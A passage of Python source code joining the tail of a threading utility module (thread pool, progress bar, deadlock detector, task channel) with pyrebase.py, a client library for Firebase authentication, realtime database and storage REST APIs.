"""Returns the next item that was generated or raises an exception if one
occurred.
Raises:
ThreadPoolEmpty - no results available.
"""
# Get first available result.
for result in self.iter_results():
return result
# No results -> tasks queue is empty.
raise ThreadPoolEmpty('Task queue is empty')
def iter_results(self):
"""Yields results as they appear until all tasks are processed."""
while True:
# Check for pending results.
result = None
self._on_iter_results_step()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
six.reraise(e[0], e[1], e[2])
if self._outputs:
# Remember the result to yield it outside of the lock.
result = self._outputs.pop(0)
else:
# No pending tasks -> all tasks are done.
if not self._pending_count:
return
# Some task is queued, wait for its result to appear.
# Use non-None timeout so that process reacts to Ctrl+C and other
# signals, see http://bugs.python.org/issue8844.
self._outputs_exceptions_cond.wait(timeout=0.1)
continue
yield result
def close(self):
"""Closes all the threads."""
# Ensure no new threads can be started, self._workers is effectively
# a constant after that and can be accessed outside the lock.
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not close already closed ThreadPool')
self._is_closed = True
for _ in range(len(self._workers)):
# Enqueueing None causes the worker to stop.
self.tasks.put(None)
for t in self._workers:
# 'join' without timeout blocks signal handlers, spin with timeout.
while t.is_alive():
t.join(30)
logging.debug(
'Thread pool \'%s\' closed: spawned %d threads total',
self._prefix, len(self._workers))
def abort(self):
"""Empties the queue.
To be used when the pool should stop early, like when Ctrl-C was detected.
Returns:
Number of tasks cancelled.
"""
index = 0
while True:
try:
self.tasks.get_nowait()
self.tasks.task_done()
index += 1
except Queue.Empty:
return index
def _on_iter_results_step(self):
pass
def __enter__(self):
"""Enables 'with' statement."""
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Enables 'with' statement."""
self.close()
class AutoRetryThreadPool(ThreadPool):
"""Automatically retries enqueued operations on exception."""
# See also PRIORITY_* module-level constants.
INTERNAL_PRIORITY_BITS = (1<<8) - 1
def __init__(self, exceptions, retries, *args, **kwargs):
"""
Arguments:
exceptions: list of exception classes that can be retried on.
retries: maximum number of retries to do.
"""
assert exceptions and all(issubclass(e, Exception) for e in exceptions), (
exceptions)
assert 1 <= retries <= self.INTERNAL_PRIORITY_BITS
super(AutoRetryThreadPool, self).__init__(*args, **kwargs)
self._swallowed_exceptions = tuple(exceptions)
self._retries = retries
def add_task(self, priority, func, *args, **kwargs):
"""Tasks added must not use the lower priority bits since they are reserved
for retries.
"""
assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
return super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
None,
func,
*args,
**kwargs)
def add_task_with_channel(self, channel, priority, func, *args, **kwargs):
"""Tasks added must not use the lower priority bits since they are reserved
for retries.
"""
assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
return super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
channel,
func,
*args,
**kwargs)
def _task_executer(self, priority, channel, func, *args, **kwargs):
"""Wraps the function and automatically retry on exceptions."""
try:
result = func(*args, **kwargs)
if channel is None:
return result
channel.send_result(result)
# pylint: disable=catching-non-exception
except self._swallowed_exceptions as e:
# Retry a few times, lowering the priority.
actual_retries = priority & self.INTERNAL_PRIORITY_BITS
if actual_retries < self._retries:
priority += 1
logging.debug(
'Swallowed exception \'%s\'. Retrying at lower priority %X',
e, priority)
super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
channel,
func,
*args,
**kwargs)
return
if channel is None:
raise
channel.send_exception()
except Exception:
if channel is None:
raise
channel.send_exception()
class IOAutoRetryThreadPool(AutoRetryThreadPool):
"""Thread pool that automatically retries on IOError.
Supposed to be used for IO bound tasks, and thus default maximum number of
worker threads is independent of number of CPU cores.
"""
# Initial and maximum number of worker threads.
INITIAL_WORKERS = 2
MAX_WORKERS = 16 if sys.maxsize > 2**32 else 8
RETRIES = 5
def __init__(self):
super(IOAutoRetryThreadPool, self).__init__(
[IOError],
self.RETRIES,
self.INITIAL_WORKERS,
self.MAX_WORKERS,
0,
'io')
class Progress(object):
"""Prints progress and accepts updates thread-safely."""
def __init__(self, columns):
"""Creates a Progress bar that will updates asynchronously from the worker
threads.
Arguments:
columns: list of tuple(name, initialvalue), defines both the number of
columns and their initial values.
"""
assert all(
len(c) == 2 and isinstance(c[0], str) and isinstance(c[1], int)
for c in columns), columns
# Members to be used exclusively in the primary thread.
self.use_cr_only = True
self.unfinished_commands = set()
self.start = time.time()
self._last_printed_line = ''
self._columns = [c[1] for c in columns]
self._columns_lookup = dict((c[0], i) for i, c in enumerate(columns))
# Setting it to True forces a print on the first print_update() call.
self._value_changed = True
# To be used in all threads.
self._queued_updates = Queue.Queue()
def update_item(self, name, raw=False, **kwargs):
"""Queue information to print out.
Arguments:
name: string to print out to describe something that was completed.
raw: if True, prints the data without the header.
raw: if True, prints the data without the header.
<kwargs>: argument name is a name of a column. it's value is the increment
to the column, value is usually 0 or 1.
"""
assert isinstance(name, basestring), repr(name)
assert isinstance(raw, bool), repr(raw)
assert all(isinstance(v, int) for v in kwargs.values()), repr(kwargs)
args = [(self._columns_lookup[k], v) for k, v in kwargs.items() if v]
self._queued_updates.put((name, raw, args))
def print_update(self):
"""Prints the current status."""
# Flush all the logging output so it doesn't appear within this output.
for handler in logging.root.handlers:
handler.flush()
got_one = False
while True:
try:
name, raw, args = self._queued_updates.get_nowait()
except Queue.Empty:
break
for k, v in args:
self._columns[k] += v
self._value_changed = bool(args)
if not name:
# Even if raw=True, there's nothing to print.
continue
got_one = True
if raw:
# Prints the data as-is.
self._last_printed_line = ''
sys.stdout.write('\n%s\n' % name.strip('\n'))
else:
line, self._last_printed_line = self._gen_line(name)
sys.stdout.write(line)
if not got_one and self._value_changed:
# Make sure a line is printed in that case where statistics changes.
line, self._last_printed_line = self._gen_line('')
sys.stdout.write(line)
got_one = True
self._value_changed = False
if got_one:
# Ensure that all the output is flushed to prevent it from getting mixed
# with other output streams (like the logging streams).
sys.stdout.flush()
if self.unfinished_commands:
logging.debug('Waiting for the following commands to finish:\n%s',
'\n'.join(self.unfinished_commands))
def _gen_line(self, name):
"""Generates the line to be printed."""
next_line = ('[%s] %6.2fs %s') % (
self._render_columns(), time.time() - self.start, name)
# Fill it with whitespace only if self.use_cr_only is set.
prefix = ''
if self.use_cr_only and self._last_printed_line:
prefix = '\r'
if self.use_cr_only:
suffix = ' ' * max(0, len(self._last_printed_line) - len(next_line))
else:
suffix = '\n'
return '%s%s%s' % (prefix, next_line, suffix), next_line
def _render_columns(self):
"""Renders the columns."""
columns_as_str = map(str, self._columns)
max_len = max(map(len, columns_as_str))
return '/'.join(i.rjust(max_len) for i in columns_as_str)
class QueueWithProgress(Queue.PriorityQueue):
"""Implements progress support in join()."""
def __init__(self, progress, *args, **kwargs):
Queue.PriorityQueue.__init__(self, *args, **kwargs)
self.progress = progress
def task_done(self):
"""Contrary to Queue.task_done(), it wakes self.all_tasks_done at each task
done.
"""
with self.all_tasks_done:
try:
unfinished = self.unfinished_tasks - 1
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.unfinished_tasks = unfinished
# This is less efficient, because we want the Progress to be updated.
self.all_tasks_done.notify_all()
except Exception as e:
logging.exception('task_done threw an exception.\n%s', e)
def wake_up(self):
"""Wakes up all_tasks_done.
Unlike task_done(), do not substract one from self.unfinished_tasks.
"""
# TODO(maruel): This is highly inefficient, since the listener is awaken
# twice; once per output, once per task. There should be no relationship
# between the number of output and the number of input task.
with self.all_tasks_done:
self.all_tasks_done.notify_all()
def join(self):
"""Calls print_update() whenever possible."""
self.progress.print_update()
with self.all_tasks_done:
while self.unfinished_tasks:
self.progress.print_update()
# Use a short wait timeout so updates are printed in a timely manner.
# TODO(maruel): Find a way so Progress.queue and self.all_tasks_done
# share the same underlying event so no polling is necessary.
self.all_tasks_done.wait(0.1)
self.progress.print_update()
class ThreadPoolWithProgress(ThreadPool):
QUEUE_CLASS = QueueWithProgress
def __init__(self, progress, *args, **kwargs):
self.QUEUE_CLASS = functools.partial(self.QUEUE_CLASS, progress)
super(ThreadPoolWithProgress, self).__init__(*args, **kwargs)
def _output_append(self, out):
"""Also wakes up the listener on new completed test_case."""
super(ThreadPoolWithProgress, self)._output_append(out)
self.tasks.wake_up()
def _on_iter_results_step(self):
self.tasks.progress.print_update()
class DeadlockDetector(object):
"""Context manager that can detect deadlocks.
It will dump stack frames of all running threads if its 'ping' method isn't
called in time.
Usage:
with DeadlockDetector(timeout=60) as detector:
for item in some_work():
...
detector.ping()
...
Arguments:
timeout - maximum allowed time between calls to 'ping'.
"""
def __init__(self, timeout):
self.timeout = timeout
self._thread = None
# Thread stop condition. Also lock for shared variables below.
self._stop_cv = threading.Condition()
self._stop_flag = False
# Time when 'ping' was called last time.
self._last_ping = None
# True if pings are coming on time.
self._alive = True
def __enter__(self):
"""Starts internal watcher thread."""
assert self._thread is None
self.ping()
self._thread = threading.Thread(name='deadlock-detector', target=self._run)
self._thread.daemon = True
self._thread.start()
return self
def __exit__(self, *_args):
"""Stops internal watcher thread."""
assert self._thread is not None
with self._stop_cv:
self._stop_flag = True
self._stop_cv.notify()
self._thread.join()
self._thread = None
self._stop_flag = False
def ping(self):
"""Notify detector that main thread is still running.
Should be called periodically to inform the detector that everything is
running as it should.
"""
with self._stop_cv:
self._last_ping = time.time()
self._alive = True
def _run(self):
"""Loop that watches for pings and dumps threads state if ping is late."""
with self._stop_cv:
while not self._stop_flag:
# Skipped deadline? Dump threads and switch to 'not alive' state.
if self._alive and time.time() > self._last_ping + self.timeout:
self.dump_threads(time.time() - self._last_ping, True)
self._alive = False
# Pings are on time?
if self._alive:
# Wait until the moment we need to dump stack traces.
# Most probably some other thread will call 'ping' to move deadline
# further in time. We don't bother to wake up after each 'ping',
# only right before initial expected deadline.
self._stop_cv.wait(self._last_ping + self.timeout - time.time())
else:
# Skipped some pings previously. Just periodically silently check
# for new pings with some arbitrary frequency.
self._stop_cv.wait(self.timeout * 0.1)
@staticmethod
def dump_threads(timeout=None, skip_current_thread=False):
"""Dumps stack frames of all running threads."""
all_threads = threading.enumerate()
current_thread_id = threading.current_thread().ident
# Collect tracebacks: thread name -> traceback string.
tracebacks = {}
# pylint: disable=W0212
for thread_id, frame in sys._current_frames().items():
# Don't dump deadlock detector's own thread, it's boring.
if thread_id == current_thread_id and skip_current_thread:
continue
# Try to get more informative symbolic thread name.
name = 'untitled'
for thread in all_threads:
if thread.ident == thread_id:
name = thread.name
break
name += ' #%d' % (thread_id,)
tracebacks[name] = ''.join(traceback.format_stack(frame))
# Function to print a message. Makes it easier to change output destination.
def output(msg):
logging.warning(msg.rstrip())
# Print tracebacks, sorting them by thread name. That way a thread pool's
# threads will be printed as one group.
output('=============== Potential deadlock detected ===============')
if timeout is not None:
output('No pings in last %d sec.' % (timeout,))
output('Dumping stack frames for all threads:')
for name in sorted(tracebacks):
output('Traceback for \'%s\':\n%s' % (name, tracebacks[name]))
output('===========================================================')
class TaskChannel(object):
"""Queue of results of async task execution."""
class Timeout(Exception):
"""Raised by 'pull' in case of timeout."""
_ITEM_RESULT = object()
_ITEM_EXCEPTION = object()
_ITEM_DONE = object()
def __init__(self):
self._queue = Queue.Queue()
def send_result(self, result):
"""Enqueues a result of task execution."""
self._queue.put((self._ITEM_RESULT, result))
def send_done(self):
"""Stops the iteration."""
self._queue.put((self._ITEM_DONE, None))
def send_exception(self, exc_info=None):
"""Enqueue an exception raised by a task.
Arguments:
exc_info: If given, should be 3-tuple returned by sys.exc_info(),
default is current value of sys.exc_info(). Use default in
'except' blocks to capture currently processed exception.
"""
exc_info = exc_info or sys.exc_info()
assert isinstance(exc_info, tuple) and len(exc_info) == 3
# Transparently passing Timeout will break 'pull' contract, since a caller
# has no way to figure out that's an exception from the task and not from
# 'pull' itself. Transform Timeout into generic RuntimeError with
# explanation.
if isinstance(exc_info[1], TaskChannel.Timeout):
exc_info = (
RuntimeError,
RuntimeError('Task raised Timeout exception'),
exc_info[2])
self._queue.put((self._ITEM_EXCEPTION, exc_info))
def __iter__(self):
return self
def next(self, timeout=None):
"""Dequeues available result or exception.
Args:
timeout: if not None will block no longer than |timeout| seconds and will
raise TaskChannel.Timeout exception if no results are available.
Returns:
Whatever task pushes to the queue by calling 'send_result'.
Raises:
TaskChannel.Timeout: waiting longer than |timeout|.
Whatever exception task raises.
"""
# Do not ever use timeout == None, in that case signal handlers are not
# being called (at least on Python 2.7, http://bugs.python.org/issue8844).
while True:
try:
item_type, value = self._queue.get(
timeout=timeout if timeout is not None else 30.0)
break
except Queue.Empty:
if timeout is None:
continue
raise TaskChannel.Timeout()
if item_type == self._ITEM_RESULT:
return value
if item_type == self._ITEM_EXCEPTION:
# 'value' is captured sys.exc_info() 3-tuple. Use extended raise syntax
# to preserve stack frame of original exception (that was raised in
# another thread).
assert isinstance(value, tuple) and len(value) == 3
six.reraise(value[0], value[1], value[2])
if item_type == self._ITEM_DONE:
raise StopIteration()
assert False, 'Impossible queue item type: %r' % item_type
def wrap_task(self, task):
"""Decorator that makes a function push results into this channel."""
@functools.wraps(task)
def wrapped(*args, **kwargs):
try:
self.send_result(task(*args, **kwargs))
except Exception:
self.send_exception()
return wrapped
def num_processors():
"""Returns the number of processors.
Python on OSX 10.6 raises a NotImplementedError exception.
"""
try:
# Multiprocessing
import multiprocessing
return multiprocessing.cpu_count()
except: # pylint: disable=W0702
try:
# Mac OS 10.6
return int(os.sysconf('SC_NPROCESSORS_ONLN')) # pylint: disable=E1101
except:
# Some of the windows builders seem to get here.
return 4
|
pyrebase.py | import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except:
from urllib import urlencode, quote
import json
import math
from random import randrange
import time
from collections import OrderedDict
from .pyre_sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from gcloud import storage
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import python_jwt as jwt
from Crypto.PublicKey import RSA
import datetime
def initialize_app(config):
return Firebase(config)
class Firebase:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config["apiKey"]
self.auth_domain = config["authDomain"]
self.database_url = config["databaseURL"]
self.storage_bucket = config["storageBucket"]
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials.from_json_keyfile_name(config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials.from_json_keyfile_dict(config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment
# is releated to https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.', error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(max_retries=3)
else:
adapter = requests.adapters.HTTPAdapter(max_retries=3)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(self.credentials, self.api_key, self.database_url, self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def sign_in_anonymous(self):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8" }
data = json.dumps({"returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None, expiry_minutes=60):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid
}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=expiry_minutes)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token", "refreshToken": refresh_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getAccountInfo?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/resetPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8" }
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def delete_user_account(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/deleteAccount?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def build_request_url(self, token):
parameters = {}
if token:
parameters['auth'] = token
for param in list(self.build_query):
if type(self.build_query[param]) is str:
parameters[param] = '"' + self.build_query[param] + '"'
elif type(self.build_query[param]) is bool:
parameters[param] = "true" if self.build_query[param] else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(convert_to_pyre(request_dict.items()), query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
sorted_response = sorted(request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(request_dict.items(), key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None, is_async=True):
request_ref = self.build_request_url(token)
return Stream(request_ref, stream_handler, self.build_headers, stream_id, is_async)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
push_chars = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
self.last_rand_chars = [randrange(64) for _ in range(12)]
else:
for i in range(0, 11):
if self.last_rand_chars[i] == 63:
self.last_rand_chars[i] = 0
self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
def sort(self, origin, by_key, reverse=False):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key], reverse=reverse)
return PyreResponse(convert_to_pyre(data), origin.key())
def get_etag(self, token=None, json_kwargs={}):
request_ref = self.build_request_url(token)
headers = self.build_headers(token)
# extra header to get ETag
headers['X-Firebase-ETag'] = 'true'
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.headers['ETag']
def conditional_set(self, data, etag, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
headers['if-match'] = etag
request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
# ETag didn't match, so we should return the correct one for the user to try again
if request_object.status_code == 412:
return {'ETag': request_object.headers['ETag']}
raise_detailed_error(request_object)
return request_object.json()
def conditional_remove(self, etag, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
headers['if-match'] = etag
request_object = self.requests.delete(request_ref, headers=headers)
# ETag didn't match, so we should return the correct one for the user to try again
if request_object.status_code == 412:
return {'ETag': request_object.headers['ETag']}
raise_detailed_error(request_object)
return request_object.json()
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
self.storage_bucket = "https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(credentials=credentials, project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
file_object = open(file, 'rb')
else:
file_object = file
request_ref = self.storage_bucket + "/o?name={0}".format(path)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = self.requests.post(request_ref, headers=headers, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file, str):
return blob.upload_from_filename(filename=file)
else:
return blob.upload_from_file(file_obj=file)
else:
request_object = self.requests.post(request_ref, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, path, filename, token=None):
# remove leading backlash
url = self.get_url(token)
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
if not blob is None:
blob.download_to_filename(filename)
elif token:
headers = {"Authorization": "Firebase " + token}
r = requests.get(url, stream=True, headers=headers)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
else:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket, quote(path, safe=''))
def list_files(self):
return self.bucket.list_blobs()
def raise_detailed_error(request_object):
try:
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre([items.index(item), item]))
return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def __getitem__(self,index):
return self.pyres[index]
def val(self):
if isinstance(self.pyres, list) and self.pyres:
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id, is_async):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
if is_async:
self.start()
else:
self.start_stream()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(self.url, session=self.make_session(), build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
while not self.sse and not hasattr(self.sse, 'resp'):
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
|
